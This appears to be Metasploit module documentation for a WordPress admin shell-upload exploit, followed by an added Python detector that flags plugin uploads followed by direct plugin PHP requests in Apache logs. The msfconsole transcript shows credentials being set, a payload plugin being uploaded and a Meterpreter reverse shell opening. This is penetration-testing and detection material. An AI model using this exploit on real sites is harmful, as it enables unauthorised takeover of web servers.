## Vulnerable Application

This module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress.

### Vulnerable Application Installation

You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/) or from some Linux package managers. [Debian maintains an installation guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.

Note that in a default install of WP from apt, the plugins directory is owned by root, so unless you chown it to the web user, this module will not work. Doing so is common in real-world deployments to allow legitimate administrators to install plugins, so it is not unreasonable for your own installation.

## Verification Steps

```
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(wp_admin_shell_upload) > set PASSWORD password
PASSWORD => password
msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
TARGETURI => /wp/
msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Authenticating with WordPress using admin:password...
[+] Login successful
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: afa507398f
[*] Uploaded plugin iHNhrYLmGR
[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
[*] Sending stage (33986 bytes) to 192.168.100.131
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
[+] Deleted DcrpFXPOCG.php
[+] Deleted iHNhrYLmGR.php

meterpreter > pwd
/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
meterpreter >
```
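
For defenders, the run above leaves a recognisable sequence in the web server's access log: a plugin upload POST, then a direct request for a `.php` file inside the new plugin directory. The following detection sketch is an added example, not part of the module or of Metasploit. It assumes Apache combined log format and WordPress's standard `update.php?action=upload-plugin` endpoint; the function name, the 60-second window and the log lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
192.168.100.1 - - [21/Apr/2017:11:36:30 -0500] "POST /wp/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.100.1 - - [21/Apr/2017:11:36:31 -0500] "GET /wp/wp-admin/plugin-install.php?tab=upload HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.168.100.1 - - [21/Apr/2017:11:36:32 -0500] "POST /wp/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5310 "-" "Mozilla/5.0"
192.168.100.1 - - [21/Apr/2017:11:36:33 -0500] "GET /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.100.7 - - [21/Apr/2017:11:40:02 -0500] "GET /wp/wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
# Standard WordPress plugin upload handler (assumed unmodified install).
UPLOAD_RE = re.compile(r'/wp-admin/update\.php\?(?:.*&)?action=upload-plugin')
# Direct request for a PHP file one level below a plugin directory.
PLUGIN_PHP_RE = re.compile(r'/wp-content/plugins/(?P<plugin>[^/]+)/[^/?]+\.php(?:\?|$)')


def find_upload_then_exec(log_text, window=timedelta(seconds=60)):
    """Return (ip, plugin_dir, uri) for direct plugin .php hits that follow an upload."""
    last_upload = {}  # client IP -> time of its most recent plugin upload POST
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, uri = m["ip"], m["uri"]
        if m["method"] == "POST" and UPLOAD_RE.search(uri):
            last_upload[ip] = ts
            continue
        hit = PLUGIN_PHP_RE.search(uri)
        # Flag only when the same client uploaded a plugin shortly before.
        if hit and ip in last_upload and timedelta(0) <= ts - last_upload[ip] <= window:
            findings.append((ip, hit["plugin"], uri))
    return findings


if __name__ == "__main__":
    for ip, plugin, uri in find_upload_then_exec(SAMPLE_LOG):
        print(f"ALERT {ip}: uploaded a plugin, then requested {uri} (plugin dir {plugin})")
```

Because the transcript shows the module deleting its uploaded files after the session opens, the access log is often the more durable artifact than the plugins directory itself. Treat a match as a triage signal to correlate with the admin login that preceded it, not as proof on its own.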